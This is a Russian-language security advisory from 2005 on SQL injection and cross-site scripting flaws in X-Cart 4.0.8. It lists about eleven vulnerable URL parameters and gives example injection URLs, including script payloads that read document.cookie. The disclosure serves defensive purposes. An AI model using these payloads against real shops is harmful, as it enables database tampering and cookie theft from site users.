Security Lab

SQL-инъекция и межсайтовый скриптинг в X-Cart

Дата публикации:01.06.2005
Дата изменения:17.10.2006
Всего просмотров:1924
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-1822
CVE-2005-1823
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Qualiteam X-Cart Gold 4.x
Уязвимые версии: X-Cart 4.0.8

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Программное обеспечение недостаточно обрабатывает входные данные в нескольких параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[target]/home.php?cat='[SQL-inj]
http://[target]/ home.php?printable='[SQL-inj]
http://[target]/product.php?productid='[SQL-inj]
http://[target]/product.php?mode='[SQL-inj]
http://[target]/error_message.php?access_den ied&id='[SQL-inj]
http://[target]/help.php?section='[SQL-inj]
http://[target]/orders.php?mode='[SQL-inj]
http://[target]/register.php?mode='[SQL-inj]
http://[target]/ search.php?mode='[SQL-inj]
http://[target]/giftcert.php?gcid='[SQL-inj]
http://[target]/giftcert.php?gcindex='[SQL-inj]

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/home.php?cat='><script>alert(document.cookie)</script>
ht tp://[target]/home.php?printable='><script>alert(document.cookie)</script>
http://[target]/product.php?productid='><script>alert(document.cookie)</s cript>
http://[target]/product.php?mode='><script>alert(document.cookie)</script>
http://[target]/error_message.php?access_denied&id='><script>aler t(document.cookie)</script>
http://[target]/help.php?section='><script>alert(document.cookie)</script>
http://[target]/orders.php?mode='><script&gt ;alert(document.cookie)</script>
http://[target]/register.php?mode='><script>alert(document.cookie)</script>
http://[target]/search.php?mode='><scr ipt>alert(document.cookie)</script>
http://[target]/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://[target]/giftcert.php?gcinde x='><script>alert(document.cookie)</script>

URL производителя: www.x-cart.com

Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки: Multiple vulnerabilities in x-cart Gold